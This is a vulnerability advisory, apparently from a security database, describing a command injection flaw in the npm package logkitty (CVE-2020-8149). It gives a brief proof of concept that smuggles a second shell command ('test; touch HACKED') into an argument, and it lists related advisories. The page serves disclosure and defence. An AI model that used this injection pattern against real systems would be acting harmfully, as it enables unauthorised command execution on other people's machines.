Lucene search
Mik3171-NPM-LOGKITTYHistoryMar 27, 2020 - 12:00 a.m.
Command Injection in zamotany/logkitty
2020-03-2700:00:00
mik317
www.huntr.dev
4
0.01 Low
EPSS
Percentile
83.3%
Overview
The issue occurs because a user input is formatted inside a command that will be executed without any check.
Proof of Concept (Credit: Mik317)
- Check there aren’t files called
HACKED - Execute the following commands in another terminal:
npm i logkitty # Install affected module
logkitty android app 'test; touch HACKED' # Note the *touch command* is inside the *'* (single quote), so it's an argument, while it will be executed anyway
- Recheck the files: now
HACKEDhas been created
Related
veracode
veracode
OS Command Injection
2020-05-11 00:43:16
cve
cve
CVE-2020-8149
2020-05-15 19:15:12
prion
prion
Design/Logic Flaw
2020-05-15 19:15:00
osv
osv
CVE-2020-8149
2020-05-15 19:15:12
Arbitrary shell command execution in logkitty
2020-06-05 14:47:02
github
github
Arbitrary shell command execution in logkitty
2020-06-05 14:47:02
githubexploit
githubexploit
Exploit for Code Injection in Logkitty Project Logkitty
2020-12-01 09:45:48
hackerone
hackerone
Node.js third-party modules: [logkitty] RCE via insecure command formatting
2020-03-21 00:53:36
cvelist
cvelist
CVE-2020-8149
2020-05-15 18:50:27
nvd
nvd
CVE-2020-8149
2020-05-15 19:15:12